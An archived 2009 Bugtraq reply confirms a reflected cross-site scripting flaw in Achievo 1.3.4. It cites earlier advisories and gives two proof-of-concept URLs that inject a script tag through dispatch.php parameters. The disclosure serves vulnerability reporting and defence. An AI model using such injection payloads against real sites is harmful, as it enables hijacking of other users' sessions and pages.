Re: [InterN0T] Achievo 1.3.4 - XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: [InterN0T] Achievo 1.3.4 - XSS Vulnerability
From: security@xxxxxxxxxxxx
Date: Fri, 29 May 2009 01:31:13 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

In regards to the previous researchers i found out this vulnerability and 
another has already been disclosed.

http://www.securityfocus.com/bid/31326/info (ver 1.3.2)
http://secunia.com/advisories/31973/ (ver. 1.3.2)

However, i can confirm that the vulnerability below still exists in the newest 
version (1.3.4) of the platform as well:
http://www.website.tld/achievo/dispatch.php?atknodetype=";>><script>alert(1)</script>&atkaction=adminpim&atklevel=-1&atkprevlevel%20=0&achievo=cgvuu4c9nv45ofdq8ntv1inm82

If One would like the XSS to be triggered directly on the site the user enters, 
One can prepend > after ">.

Example: (thanks to Rohit Bansal for this information)
http://www.website.tld/achievo/dispatch.php?atknodetype=&atkaction=";>><script>alert(1)</script>&atklevel=-1&atkprevlevel
 =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82

I'm sorry i didn't check other sites before submitting.


All of the best,
MaXe

Prev by Date: SonicWALL SSL-VPN Appliance Format String Vulnerability
Next by Date: Whitepaper
Previous by thread: [InterN0T] Achievo 1.3.4 - XSS Vulnerability
Next by thread: [TZO-28-2009] - Avira Antivir generic RAR,CAB,ZIP
Index(es):
- Date
- Thread